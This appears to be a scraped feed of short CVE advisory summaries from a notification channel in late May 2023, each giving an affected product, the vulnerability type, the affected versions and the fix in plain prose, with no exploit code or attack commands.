| 2023-05-31 11:58:24 |
🚨 CVE-2022-29827Use of Hard-coded Cryptographic Key vulnerability in Mitsubishi Electric GX Works3 all versions allows a remote unauthenticated attacker to disclose sensitive information. As a result, unauthenticated users may view programs and project files or execute programs illegally.🎖@cveNotify |
|
| 2023-05-31 11:58:20 |
🚨 CVE-2022-29828Use of Hard-coded Cryptographic Key vulnerability in Mitsubishi Electric GX Works3 all versions allows a remote unauthenticated attacker to disclose sensitive information. As a result, unauthenticated users may view programs and project file or execute programs illegally.🎖@cveNotify |
|
| 2023-05-31 11:58:19 |
🚨 CVE-2022-29832Cleartext Storage of Sensitive Information in Memory vulnerability in Mitsubishi Electric Corporation GX Works3 versions 1.015R and later, GX Works2 all versions and GX Developer versions 8.40S and later allows a remote unauthenticated attacker to disclose sensitive information. As a result, unauthenticated users could obtain information about the project file for MELSEC safety CPU modules or project file for MELSEC Q/FX/L series with security setting.🎖@cveNotify |
|
| 2023-05-31 11:58:18 |
🚨 CVE-2022-29833Insufficiently Protected Credentials vulnerability in Mitsubishi Electric Corporation GX Works3 versions 1.015R and later allows a remote unauthenticated attacker to disclose sensitive information. As a result, unauthenticated users could access to MELSEC safety CPU modules illgally.🎖@cveNotify |
|
| 2023-05-31 11:58:17 |
🚨 CVE-2022-29831Use of Hard-coded Password vulnerability in Mitsubishi Electric Corporation GX Works3 versions 1.015R and later allows a remote unauthenticated attacker to obtain information about the project file for MELSEC safety CPU modules.🎖@cveNotify |
|
| 2023-05-31 11:58:14 |
🚨 CVE-2023-25934DELL ECS prior to 3.8.0.2 contains an improper verification of cryptographic signature vulnerability. A network attacker with an ability to intercept the request could potentially exploit this vulnerability to modify the body data of the request.🎖@cveNotify |
|
| 2023-05-31 11:58:13 |
🚨 CVE-2023-25539Dell NetWorker 19.6.1.2, contains an OS command injection Vulnerability in the NetWorker client. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. This is a high severity vulnerability as the exploitation allows an attacker to take complete control of a system, so Dell recommends customers to upgrade at the earliest opportunity.🎖@cveNotify |
|
| 2023-05-31 11:58:12 |
🚨 CVE-2023-2304The Favorites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'user_favorites' shortcode in versions up to, and including, 2.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-05-31 01:58:30 |
🚨 CVE-2023-29743An issue found in BestWeather v.7.3.1 for Android allows unauthorized apps to cause a persistent denial of service attack by manipulating the database.🎖@cveNotify |
|
| 2023-05-31 01:58:29 |
🚨 CVE-2023-22654Client-side enforcement of server-side security issue exists in T&D Corporation and ESPEC MIC CORP. data logger products, which may lead to an arbitrary script execution on a logged-in user's web browser. Affected products and versions are as follows: T&D Corporation data logger products (TR-71W/72W all firmware versions, RTR-5W all firmware versions, WDR-7 all firmware versions, WDR-3 all firmware versions, and WS-2 all firmware versions), and ESPEC MIC CORP. data logger products (RT-12N/RS-12N all firmware versions, RT-22BN all firmware versions, and TEU-12N all firmware versions).🎖@cveNotify |
|
| 2023-05-31 01:58:28 |
🚨 CVE-2023-23545Missing authentication for critical function exists in T&D Corporation and ESPEC MIC CORP. data logger products, which may allow a remote unauthenticated attacker to alter the product settings without authentication. Affected products and versions are as follows: T&D Corporation data logger products (TR-71W/72W all firmware versions, RTR-5W all firmware versions, WDR-7 all firmware versions, WDR-3 all firmware versions, and WS-2 all firmware versions), and ESPEC MIC CORP. data logger products (RT-12N/RS-12N all firmware versions, RT-22BN all firmware versions, and TEU-12N all firmware versions).🎖@cveNotify |
|
| 2023-05-31 01:58:24 |
🚨 CVE-2023-27384Operation restriction bypass vulnerability in MultiReport of Cybozu Garoon 5.15.0 allows a remote authenticated attacker to alter the data of MultiReport.🎖@cveNotify |
|
| 2023-05-31 01:58:23 |
🚨 CVE-2023-2933Use after free in PDF in Google Chrome prior to 114.0.5735.90 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-05-31 01:58:22 |
🚨 CVE-2023-2929Out of bounds write in Swiftshader in Google Chrome prior to 114.0.5735.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-05-31 01:58:19 |
🚨 CVE-2023-2939Insufficient data validation in Installer in Google Chrome on Windows prior to 114.0.5735.90 allowed a local attacker to perform privilege escalation via crafted symbolic link. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-05-31 01:58:18 |
🚨 CVE-2023-2935Type Confusion in V8 in Google Chrome prior to 114.0.5735.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-05-31 01:58:17 |
🚨 CVE-2023-2940Inappropriate implementation in Downloads in Google Chrome prior to 114.0.5735.90 allowed an attacker who convinced a user to install a malicious extension to bypass file access restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-05-31 01:58:13 |
🚨 CVE-2023-2953A vulnerability was found in openldap. This security flaw causes a null pointer dereference in ber_memalloc_x() function.🎖@cveNotify |
|
| 2023-05-31 01:58:12 |
🚨 CVE-2023-2930Use after free in Extensions in Google Chrome prior to 114.0.5735.90 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-05-31 01:58:11 |
🚨 CVE-2023-2938Inappropriate implementation in Picture In Picture in Google Chrome prior to 114.0.5735.90 allowed a remote attacker who had compromised the renderer process to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-05-30 22:58:30 |
🚨 CVE-2023-25537Dell PowerEdge 14G server BIOS versions prior to 2.18.1 and Dell Precision BIOS versions prior to 2.18.2, contain an Out of Bounds write vulnerability. A local attacker with low privileges could potentially exploit this vulnerability leading to exposure of some SMRAM stack/data/code in System Management Mode, leading to arbitrary code execution or escalation of privilege.🎖@cveNotify |
|
| 2023-05-30 22:58:29 |
🚨 CVE-2023-33179Xibo is a content management system (CMS). An SQL injection vulnerability was discovered starting in version 3.2.0 and prior to version 3.3.5 in the `nameFilter` function used throughout the CMS. This allows an authenticated user to exfiltrate data from the Xibo database by injecting specially crafted values for logical operators. Users should upgrade to version 3.3.5 which fixes this issue. There are no known workarounds aside from upgrading.🎖@cveNotify |
|
| 2023-05-30 22:58:28 |
🚨 CVE-2023-33180Xibo is a content management system (CMS). An SQL injection vulnerability was discovered starting in version 3.2.0 and prior to version 3.3.2 in the `/display/map` API route inside the CMS. This allows an authenticated user to exfiltrate data from the Xibo database by injecting specially crafted values in to the `bounds` parameter. Users should upgrade to version 3.3.5, which fixes this issue. There are no known workarounds aside from upgrading.🎖@cveNotify |
|
| 2023-05-30 22:58:24 |
🚨 CVE-2022-36246Shop Beat Solutions (Pty) LTD Shop Beat Media Player 2.5.95 up to 3.2.57 is vulnerable to Insecure Permissions.🎖@cveNotify |
|
| 2023-05-30 22:58:23 |
🚨 CVE-2023-31187Avaya IX Workforce Engagement v15.2.7.1195 - CWE-522: Insufficiently Protected Credentials🎖@cveNotify |
|
| 2023-05-30 22:58:22 |
🚨 CVE-2023-33177Xibo is a content management system (CMS). A path traversal vulnerability exists in the Xibo CMS whereby a specially crafted zip file can be uploaded to the CMS via the layout import function by an authenticated user which would allow creation of files outside of the CMS library directory as the webserver user. This can be used to upload a PHP webshell inside the web root directory and achieve remote code execution as the webserver user. Users should upgrade to version 2.3.17 or 3.3.5, which fix this issue. Customers who host their CMS with Xibo Signage have already received an upgrade or patch to resolve this issue regardless of the CMS version that they are running.🎖@cveNotify |
|
| 2023-05-30 22:58:19 |
🚨 CVE-2023-33178Xibo is a content management system (CMS). An SQL injection vulnerability was discovered in the `/dataset/data/{id}` API route inside the CMS starting in version 1.4.0 and prior to versions 2.3.17 and 3.3.5. This allows an authenticated user to exfiltrate data from the Xibo database by injecting specially crafted values in to the `filter` parameter. Values allowed in the filter parameter are checked against a deny list of commands that should not be allowed, however this checking was done in a case sensitive manor and so it is possible to bypass these checks by using unusual case combinations. Users should upgrade to version 2.3.17 or 3.3.5, which fix this issue. There are no workarounds aside from upgrading.🎖@cveNotify |
|
| 2023-05-30 22:58:18 |
🚨 CVE-2022-36247Shop Beat Solutions (Pty) LTD Shop Beat Media Player 2.5.95 up to 3.2.57 is vulnerable to IDOR via controlpanel.shopbeat.co.za.🎖@cveNotify |
|
| 2023-05-30 22:58:17 |
🚨 CVE-2022-47028An issue discovered in Action Launcher for Android v50.5 allows an attacker to cause a denial of service via arbitary data injection to function insert.🎖@cveNotify |
|
| 2023-05-30 22:58:13 |
🚨 CVE-2023-23561Stormshield Endpoint Security 2.3.0 through 2.3.2 has Incorrect Access Control: authenticated users can read sensitive information.🎖@cveNotify |
|
| 2023-05-30 22:58:12 |
🚨 CVE-2023-29732SoLive 1.6.14 thru 1.6.20 for Android exists exposed component, the component provides the method to modify the SharedPreference file. The attacker can use the method to modify the data in any SharedPreference file, these data will be loaded into the memory when the application is opened. Depending on how the data is used, this can result in various attack consequences, such as ad display exceptions.🎖@cveNotify |
|
| 2023-05-30 20:58:32 |
🚨 CVE-2023-31826Skyscreamer Open Source Nevado JMS v1.3.2 does not perform security checks when receiving messages. This allows attackers to execute arbitrary commands via supplying crafted data.🎖@cveNotify |
|
| 2023-05-30 20:58:31 |
🚨 CVE-2023-2968A remote attacker can trigger a denial of service in the socket.remoteAddress variable, by sending a crafted HTTP request. Usage of the undefined variable raises a TypeError exception.🎖@cveNotify |
|
| 2023-05-30 20:58:29 |
🚨 CVE-2023-32689Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Versions prior to 5.4.4 and 6.1.1 are vulnerable to a phishing attack vulnerability that involves a user uploading malicious files. A malicious user could upload an HTML file to Parse Server via its public API. That HTML file would then be accessible at the internet domain at which Parse Server is hosted. The URL of the the uploaded HTML could be shared for phishing attacks. The HTML page may seem legitimate because it is served under the internet domain where Parse Server is hosted, which may be the same as a company's official website domain.An additional security issue arises when the Parse JavaScript SDK is used. The SDK stores sessions in the internet browser's local storage, which usually restricts data access depending on the internet domain. A malicious HTML file could contain a script that retrieves the user's session token from local storage and then share it with the attacker.The fix included in versions 5.4.4 and 6.1.1 adds a new Parse Server option `fileUpload.fileExtensions` to restrict file upload on Parse Server by file extension. It is recommended to restrict file upload for HTML file extensions, which this fix disables by default. If an app requires upload of files with HTML file extensions, the option can be set to `['.*']` or another custom value to override the default.🎖@cveNotify |
|
| 2023-05-30 20:58:28 |
🚨 CVE-2023-33656A memory leak vulnerability exists in NanoMQ 0.17.2. The vulnerability is located in the file message.c. An attacker could exploit this vulnerability to cause a denial of service attack by causing the program to consume all available memory resources.🎖@cveNotify |
|
| 2023-05-30 20:58:27 |
🚨 CVE-2023-33975RIOT-OS, an operating system for Internet of Things (IoT) devices, contains a network stack with the ability to process 6LoWPAN frames. In version 2023.01 and prior, an attacker can send a crafted frame to the device resulting in an out of bounds write in the packet buffer. The overflow can be used to corrupt other packets and the allocator metadata. Corrupting a pointer will easily lead to denial of service. While carefully manipulating the allocator metadata gives an attacker the possibility to write data to arbitrary locations and thus execute arbitrary code. This issue is fixed in pull request 19680. As a workaround, disable support for fragmented IP datagrams.🎖@cveNotify |
|
| 2023-05-30 20:58:26 |
🚨 CVE-2023-32684Lima launches Linux virtual machines, typically on macOS, for running containerd. Prior to version 0.16.0, a virtual machine instance with a malicious disk image could read a single file on the host filesystem, even when no filesystem is mounted from the host. The official templates of Lima and the well-known third party products (Colima, Rancher Desktop, and Finch) are unlikely to be affected by this issue. To exploit this issue, the attacker has to embed the target file path (an absolute or a relative path from the instance directory) in a malicious disk image, as the qcow2 (or vmdk) backing file path string. As Lima refuses to run as the root, it is practically impossible for the attacker to read the entire host disk via `/dev/rdiskN`. Also, practically, the attacker cannot read at least the first 512 bytes (MBR) of the target file. The issue has been patched in Lima in version 0.16.0 by prohibiting using a backing file path in the VM base image.🎖@cveNotify |
|
| 2023-05-30 20:58:24 |
🚨 CVE-2022-4240Missing Authentication for Critical Function vulnerability in Honeywell OneWireless allows Authentication Bypass. This issue affects OneWireless version 322.1🎖@cveNotify |
|
| 2023-05-30 20:58:23 |
🚨 CVE-2023-23755An issue was discovered in Joomla! 4.2.0 through 4.3.1. The lack of rate limiting allowed brute force attacks against MFA methods.🎖@cveNotify |
|
| 2023-05-30 20:58:22 |
🚨 CVE-2023-24826RIOT-OS, an operating system for Internet of Things (IoT) devices, contains a network stack with the ability to process 6LoWPAN frames. Prior to version 2023.04, an attacker can send crafted frames to the device to trigger the usage of an uninitialized object leading to denial of service. This issue is fixed in version 2023.04. As a workaround, disable fragment forwarding or SFR.🎖@cveNotify |
|
| 2023-05-30 20:58:21 |
🚨 CVE-2023-29737An issue found in Wave Animated Keyboard Emoji v.1.70.7 for Android allows a local attacker to cause a denial of service via the database files.🎖@cveNotify |
|
| 2023-05-30 20:58:19 |
🚨 CVE-2023-33973RIOT-OS, an operating system for Internet of Things (IoT) devices, contains a network stack with the ability to process 6LoWPAN frames. In versions 2023.01 and prior, an attacker can send a crafted frame which is forwarded by the device. During encoding of the packet a NULL pointer dereference occurs. This crashes the device leading to denial of service. A patch is available at pull request 19678. There are no known workarounds.🎖@cveNotify |
|
| 2023-05-30 20:58:18 |
🚨 CVE-2023-33974RIOT-OS, an operating system for Internet of Things (IoT) devices, contains a network stack with the ability to process 6LoWPAN frames. In versions 2023.01 and prior, an attacker can send multiple crafted frames to the device to trigger a race condition. The race condition invalidates assumptions about the program state and leads to an invalid memory access resulting in denial of service. This issue is patched in pull request 19679. There are no known workarounds.🎖@cveNotify |
|
| 2023-05-30 20:58:17 |
🚨 CVE-2022-43485Use of Insufficiently Random Values in Honeywell OneWireless. This vulnerability may allow attacker to manipulate claims in client's JWT token. This issue affects OneWireless version 322.1🎖@cveNotify |
|
| 2023-05-30 20:58:15 |
🚨 CVE-2022-46361An attacker having physical access to WDM can plug USB device to gain access and execute unwanted commands. A malicious user could enter a system command along with a backup configuration, which could result in the execution of unwanted commands. This issue affects OneWireless all versions up to 322.1 and fixed in version 322.2.🎖@cveNotify |
|
| 2023-05-30 20:58:14 |
🚨 CVE-2023-23754An issue was discovered in Joomla! 4.2.0 through 4.3.1. Lack of input validation caused an open redirect and XSS issue within the new mfa selection screen.🎖@cveNotify |
|
| 2023-05-30 20:58:13 |
🚨 CVE-2023-31664A reflected cross-site scripting (XSS) vulnerability in /authenticationendpoint/login.do of WSO2 API Manager before 4.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tenantDomain parameter.🎖@cveNotify |
|
| 2023-05-30 18:58:28 |
🚨 CVE-2023-26116Versions of the package angular from 1.2.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the angular.copy() utility function due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.🎖@cveNotify |
|
| 2023-05-30 18:58:27 |
🚨 CVE-2023-28755A ReDoS issue was discovered in the URI component through 0.12.0 in Ruby through 3.2.1. The URI parser mishandles invalid URLs that have specific characters. It causes an increase in execution time for parsing strings to URI objects. The fixed versions are 0.12.1, 0.11.1, 0.10.2 and 0.10.0.1.🎖@cveNotify |
|
| 2023-05-30 18:58:26 |
🚨 CVE-2023-28756A ReDoS issue was discovered in the Time component through 0.2.1 in Ruby through 3.2.1. The Time parser mishandles invalid URLs that have specific characters. It causes an increase in execution time for parsing strings to Time objects. The fixed versions are 0.1.1 and 0.2.2.🎖@cveNotify |
|
| 2023-05-30 18:58:25 |
🚨 CVE-2022-48303GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.🎖@cveNotify |
|
| 2023-05-30 18:58:24 |
🚨 CVE-2022-4240Missing Authentication for Critical Function vulnerability in Honeywell OneWireless allows Authentication Bypass. This issue affects OneWireless version 322.1🎖@cveNotify |
|
| 2023-05-30 18:58:23 |
🚨 CVE-2023-23755An issue was discovered in Joomla! 4.2.0 through 4.3.1. The lack of rate limiting allowed brute force attacks against MFA methods.🎖@cveNotify |
|
| 2023-05-30 18:58:22 |
🚨 CVE-2023-24826RIOT-OS, an operating system for Internet of Things (IoT) devices, contains a network stack with the ability to process 6LoWPAN frames. Prior to version 2023.04, an attacker can send crafted frames to the device to trigger the usage of an uninitialized object leading to denial of service. This issue is fixed in version 2023.04. As a workaround, disable fragment forwarding or SFR.🎖@cveNotify |
|
| 2023-05-30 18:58:21 |
🚨 CVE-2023-29737An issue found in Wave Animated Keyboard Emoji v.1.70.7 for Android allows a local attacker to cause a denial of service via the database files.🎖@cveNotify |
|
| 2023-05-30 18:58:20 |
🚨 CVE-2023-33973RIOT-OS, an operating system for Internet of Things (IoT) devices, contains a network stack with the ability to process 6LoWPAN frames. In versions 2023.01 and prior, an attacker can send a crafted frame which is forwarded by the device. During encoding of the packet a NULL pointer dereference occurs. This crashes the device leading to denial of service. A patch is available at pull request 19678. There are no known workarounds.🎖@cveNotify |
|
| 2023-05-30 18:58:19 |
🚨 CVE-2023-33974RIOT-OS, an operating system for Internet of Things (IoT) devices, contains a network stack with the ability to process 6LoWPAN frames. In versions 2023.01 and prior, an attacker can send multiple crafted frames to the device to trigger a race condition. The race condition invalidates assumptions about the program state and leads to an invalid memory access resulting in denial of service. This issue is patched in pull request 19679. There are no known workarounds.🎖@cveNotify |
|
| 2023-05-30 18:58:18 |
🚨 CVE-2022-43485Use of Insufficiently Random Values in Honeywell OneWireless. This vulnerability may allow attacker to manipulate claims in client's JWT token. This issue affects OneWireless version 322.1🎖@cveNotify |
|
| 2023-05-30 18:58:16 |
🚨 CVE-2022-46361An attacker having physical access to WDM can plug USB device to gain access and execute unwanted commands. A malicious user could enter a system command along with a backup configuration, which could result in the execution of unwanted commands. This issue affects OneWireless all versions up to 322.1 and fixed in version 322.2.🎖@cveNotify |
|
| 2023-05-30 18:58:15 |
🚨 CVE-2023-23754An issue was discovered in Joomla! 4.2.0 through 4.3.1. Lack of input validation caused an open redirect and XSS issue within the new mfa selection screen.🎖@cveNotify |
|
| 2023-05-30 18:58:14 |
🚨 CVE-2023-2859Code Injection in GitHub repository nilsteampassnet/teampass prior to 3.0.9.🎖@cveNotify |
|
| 2023-05-30 16:58:35 |
🚨 CVE-2023-27512Use of hard-coded credentials exists in SolarView Compact SV-CPT-MC310 versions prior to Ver.8.10, and SV-CPT-MC310F versions prior to Ver.8.10, which may allow a remote authenticated attacker to login the affected product with an administrative privilege and perform an unintended operation.🎖@cveNotify |
|
| 2023-05-30 16:58:34 |
🚨 CVE-2023-31742There is a command injection vulnerability in the Linksys WRT54GL router with firmware version 4.30.18.006. If an attacker gains web management privileges, they can inject commands into the post request parameters wl_ant, wl_rate, WL_atten_ctl, ttcp_num, ttcp_size in the httpd s Start_EPI() function, thereby gaining shell privileges.🎖@cveNotify |
|
| 2023-05-30 16:58:33 |
🚨 CVE-2023-27507MicroEngine Mailform version 1.1.0 to 1.1.8 contains a path traversal vulnerability. If the product's file upload function and server save option are enabled, a remote attacker may save an arbitrary file on the server and execute it.🎖@cveNotify |
|
| 2023-05-30 16:58:29 |
🚨 CVE-2023-27397Unrestricted upload of file with dangerous type exists in MicroEngine Mailform version 1.1.0 to 1.1.8. If the product's file upload function and server save option are enabled, a remote attacker may save an arbitrary file on the server and execute it.🎖@cveNotify |
|
| 2023-05-30 16:58:28 |
🚨 CVE-2023-2980A vulnerability classified as critical was found in Abstrium Pydio Cells 4.2.0. This vulnerability affects unknown code of the component User Creation Handler. The manipulation leads to improper control of resource identifiers. The attack can be initiated remotely. Upgrading to version 4.2.1 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-230212.🎖@cveNotify |
|
| 2023-05-30 16:58:27 |
🚨 CVE-2023-2983Privilege Defined With Unsafe Actions in GitHub repository pimcore/pimcore prior to 10.5.23.🎖@cveNotify |
|
| 2023-05-30 16:58:23 |
🚨 CVE-2023-2984Path Traversal: '\..\filename' in GitHub repository pimcore/pimcore prior to 10.5.22.🎖@cveNotify |
|
| 2023-05-30 16:58:22 |
🚨 CVE-2023-32997Jenkins CAS Plugin 1.6.2 and earlier does not invalidate the previous session on login.🎖@cveNotify |
|
| 2023-05-30 16:58:21 |
🚨 CVE-2023-33006A cross-site request forgery (CSRF) vulnerability in Jenkins WSO2 Oauth Plugin 1.0 and earlier allows attackers to trick users into logging in to the attacker's account.🎖@cveNotify |
|
| 2023-05-30 16:58:17 |
🚨 CVE-2023-2650Issue summary: Processing some specially crafted ASN.1 object identifiers ordata containing them may be very slow.Impact summary: Applications that use OBJ_obj2txt() directly, or use any ofthe OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no messagesize limit may experience notable to very long delays when processing thosemessages, which may lead to a Denial of Service.An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers -most of which have no size limit. OBJ_obj2txt() may be used to translatean ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSLtype ASN1_OBJECT) to its canonical numeric text form, which are thesub-identifiers of the OBJECT IDENTIFIER in decimal form, separated byperiods.When one of the sub-identifiers in the OBJECT IDENTIFIER is very large(these are sizes that are seen as absurdly large, taking up tens or hundredsof KiBs), the translation to a decimal number in text may take a very longtime. The time complexity is O(n^2) with 'n' being the size of thesub-identifiers in bytes (*).With OpenSSL 3.0, support to fetch cryptographic algorithms using names /identifiers in string form was introduced. This includes using OBJECTIDENTIFIERs in canonical numeric text form as identifiers for fetchingalgorithms.Such OBJECT IDENTIFIERs may be received through the ASN.1 structureAlgorithmIdentifier, which is commonly used in multiple protocols to specifywhat cryptographic algorithm should be used to sign or verify, encrypt ordecrypt, or digest passed data.Applications that call OBJ_obj2txt() directly with untrusted data areaffected, with any version of OpenSSL. If the use is for the mere purposeof display, the severity is considered low.In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME,CMS, CMP/CRMF or TS. It also impacts anything that processes X.509certificates, including simple things like verifying its signature.The impact on TLS is relatively low, because all versions of OpenSSL have a100KiB limit on the peer's certificate chain. Additionally, this onlyimpacts clients, or servers that have explicitly enabled clientauthentication.In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects,such as X.509 certificates. This is assumed to not happen in such a waythat it would cause a Denial of Service, so these versions are considerednot affected by this issue in such a way that it would be cause for concern,and the severity is therefore considered low.🎖@cveNotify |
|
| 2023-05-30 16:58:16 |
🚨 CVE-2023-2978A vulnerability was found in Abstrium Pydio Cells 4.2.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Change Subscription Handler. The manipulation leads to authorization bypass. Upgrading to version 4.2.1 is able to address this issue. It is recommended to upgrade the affected component. VDB-230210 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-30 16:58:15 |
🚨 CVE-2023-31995Hanwha IP Camera ANE-L7012R 1.41.01 is vulnerable to Cross Site Scripting (XSS).🎖@cveNotify |
|
| 2023-05-30 16:58:14 |
🚨 CVE-2023-28068Dell Command Monitor, versions 10.9 and prior, contains an improper folder permission vulnerability. A local authenticated malicious user can potentially exploit this vulnerability leading to privilege escalation by writing to a protected directory when Dell Command Monitor is installed to a non-default path🎖@cveNotify |
|
| 2023-05-30 10:58:33 |
🚨 CVE-2023-2296The Loginizer WordPress plugin before 1.7.9 does not escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-05-30 10:58:32 |
🚨 CVE-2023-2470The Add to Feedly WordPress plugin through 1.2.11 does not sanitize and escape its settings, allowing high-privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.🎖@cveNotify |
|
| 2023-05-30 10:58:30 |
🚨 CVE-2023-2518The Easy Forms for Mailchimp WordPress plugin through 6.8.8 does not sanitise and escape a parameter before outputting it back in the page when the debug option is enabled, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.🎖@cveNotify |
|
| 2023-05-30 10:58:29 |
🚨 CVE-2023-30601Privilege escalation when enabling FQL/Audit logs allows user with JMX access to run arbitrary commands as the user running Apache CassandraThis issue affects Apache Cassandra: from 4.0.0 through 4.0.9, from 4.1.0 through 4.1.1.WORKAROUNDThe vulnerability requires nodetool/JMX access to be exploitable, disable access for any non-trusted users.MITIGATIONUpgrade to 4.0.10 or 4.1.2 and leave the new FQL/Auditlog configuration property allow_nodetool_archive_command as false.🎖@cveNotify |
|
| 2023-05-30 10:58:28 |
🚨 CVE-2023-33191Kyverno is a policy engine designed for Kubernetes. Kyverno seccomp control can be circumvented. Users of the podSecurity `validate.podSecurity` subrule in Kyverno 1.9.2 and 1.9.3 are vulnerable. This issue was patched in version 1.9.4.🎖@cveNotify |
|
| 2023-05-30 10:58:25 |
🚨 CVE-2023-33955Minio Console is the UI for MinIO Object Storage. Unicode RIGHT-TO-LEFT OVERRIDE characters can be used to mask the original filename. This issue has been patched in version 0.28.0.🎖@cveNotify |
|
| 2023-05-30 10:58:24 |
🚨 CVE-2023-33186Zulip is an open-source team collaboration tool with unique topic-based threading that combines the best of email and chat to make remote work productive and delightful. The main development branch of Zulip Server from May 2, 2023 and later, including beta versions 7.0-beta1 and 7.0-beta2, is vulnerable to a cross-site scripting vulnerability in tooltips on the message feed. An attacker who can send messages could maliciously craft a topic for the message, such that a victim who hovers the tooltip for that topic in their message feed triggers execution of JavaScript code controlled by the attacker.🎖@cveNotify |
|
| 2023-05-30 10:58:23 |
🚨 CVE-2023-33189Pomerium is an identity and context-aware access proxy. With specially crafted requests, incorrect authorization decisions may be made by Pomerium. This issue has been patched in versions 0.17.4, 0.18.1, 0.19.2, 0.20.1, 0.21.4 and 0.22.2.🎖@cveNotify |
|
| 2023-05-30 10:58:22 |
🚨 CVE-2023-33183Calendar app for Nextcloud easily sync events from various devices with your Nextcloud. Some internal paths of the website are disclosed when the SMTP server is unavailable. It is recommended that the Calendar app is updated to 3.5.5 or 4.2.3🎖@cveNotify |
|
| 2023-05-30 10:58:18 |
🚨 CVE-2023-33193Emby Server is a user-installable home media server which stores and organizes a user's media files of virtually any format and makes them available for viewing at home and abroad on a broad range of client devices. This vulnerability may allow administrative access to an Emby Server system, depending on certain user account settings. By spoofing certain headers which are intended for interoperation with reverse proxy servers, it may be possible to affect the local/non-local network determination to allow logging in without password or to view a list of user accounts which may have no password configured. Impacted are all Emby Server system which are publicly accessible and where the administrator hasn't tightened the account login configuration for administrative users. This issue has been patched in Emby Server Beta version 4.8.31 and Emby Server version 4.7.12.🎖@cveNotify |
|
| 2023-05-30 10:58:17 |
🚨 CVE-2023-28709The fix for CVE-2023-24998 was incomplete for Apache Tomcat 11.0.0-M2 to 11.0.0-M4, 10.1.5 to 10.1.7, 9.0.71 to 9.0.73 and 8.5.85 to 8.5.87. If non-default HTTP connector settings were used such that the maxParameterCount could be reached using query string parameters and a request was submitted that supplied exactly maxParameterCount parameters in the query string, the limit for uploaded request parts could be bypassed with the potential for a denial of service to occur.🎖@cveNotify |
|
| 2023-05-30 10:58:16 |
🚨 CVE-2023-23532This issue was addressed with improved checks. This issue is fixed in iOS 15.7.6 and iPadOS 15.7.6, iOS 16.4 and iPadOS 16.4, macOS Ventura 13.3. An app may be able to break out of its sandbox🎖@cveNotify |
|
| 2023-05-30 10:58:15 |
🚨 CVE-2023-27932This issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.3, tvOS 16.4, watchOS 9.4, Safari 16.4, iOS 16.4 and iPadOS 16.4. Processing maliciously crafted web content may bypass Same Origin Policy🎖@cveNotify |
|
| 2023-05-29 18:58:19 |
🚨 CVE-2023-30145Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template Injection (SSTI) vulnerability via the formats parameter.🎖@cveNotify |
|
| 2023-05-29 18:58:18 |
🚨 CVE-2022-4254sssd: libsss_certmap fails to sanitise certificate data used in LDAP filters🎖@cveNotify |
|
| 2023-05-29 18:58:17 |
🚨 CVE-2021-3621A flaw was found in SSSD, where the sssctl command was vulnerable to shell command injection via the logs-fetch and cache-expire subcommands. This flaw allows an attacker to trick the root user into running a specially crafted sssctl command, such as via sudo, to gain root access. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.🎖@cveNotify |
|
| 2023-05-29 18:58:16 |
🚨 CVE-2019-3811A vulnerability was found in sssd. If a user was configured with no home directory set, sssd would return '/' (the root directory) instead of '' (the empty string / no home directory). This could impact services that restrict the user's filesystem access to within their home directory through chroot() etc. All versions before 2.1 are vulnerable.🎖@cveNotify |
|
| 2023-05-29 18:58:15 |
🚨 CVE-2018-16838A flaw was found in sssd Group Policy Objects implementation. When the GPO is not readable by SSSD due to a too strict permission settings on the server side, SSSD will allow all authenticated users to login instead of denying access.🎖@cveNotify |
|
| 2023-05-29 16:58:12 |
🚨 CVE-2023-2962A vulnerability, which was classified as critical, has been found in SourceCodester Faculty Evaluation System 1.0. Affected by this issue is some unknown functionality of the file index.php?page=edit_user. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-230150 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-29 16:58:11 |
